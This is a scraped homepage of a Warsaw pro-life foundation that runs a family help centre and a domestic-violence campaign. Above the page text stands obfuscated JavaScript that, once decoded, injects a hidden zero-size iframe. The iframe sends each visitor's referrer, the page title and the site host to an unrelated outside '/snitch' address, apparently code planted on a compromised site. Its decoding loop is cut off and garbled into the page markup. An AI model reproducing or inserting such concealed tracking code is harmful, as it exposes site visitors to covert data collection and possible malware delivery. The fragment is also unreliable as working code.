var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00ida,'00'02)'02'00k,k'00'02)'02'00nn'00'02)'02'00woklcv'00'02)'02'00kmlg'00'02)'02'00q,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i id="home">
  • Subcribe to Our RSS Feed

WESPRZYJ NAS Przekaż 1% podatku na Fundację SOS Obrony Poczętego Życia, ofiary przemocy domowej i obronę dzieci nienarodzonych!

Pro-Life

Pro-Life

Bronimy życia od poczęcia do naturalnej śmierci. Upowszechniamy wiedzę o małżeństwie, rodzinie i dzieciach. Organizujemy akcje, konferencje i spotkania o tematyce pro life!

więcej »

Centrum Pomocy Rodzinie

Centrum Pomocy Rodzinie

Budujemy Centrum Pomocy Rodzinie im. bł. Jana Pawła II. Jego celem będzie kompleksowa materialna i psychologiczna pomoc rodzinie oraz matkom i dzieciom – ofiarom przemocy domowej.

więcej »

STOP przemocy domowej!

STOP przemocy domowej!

Jeśli jesteś ofiarą przemocy domowej lub jej świadkiem poinformuj nas! Dysponujemy profesjonalnymi ośrodkami, które dają spokój, radość i pomagają wrócić do normalnego życia.

więcej »
Show/Hide Footer Actions
Fundacja S.O.S. Obrony Poczętego Życia
nr KRS 0000215438
ul. Nowolipie 9/11, lok. 75
00-150 Warszawa
tel./fax. (0-22) 831 28 06
e-mail: biuro@fundacjasos.pl

Wesprzyj nas: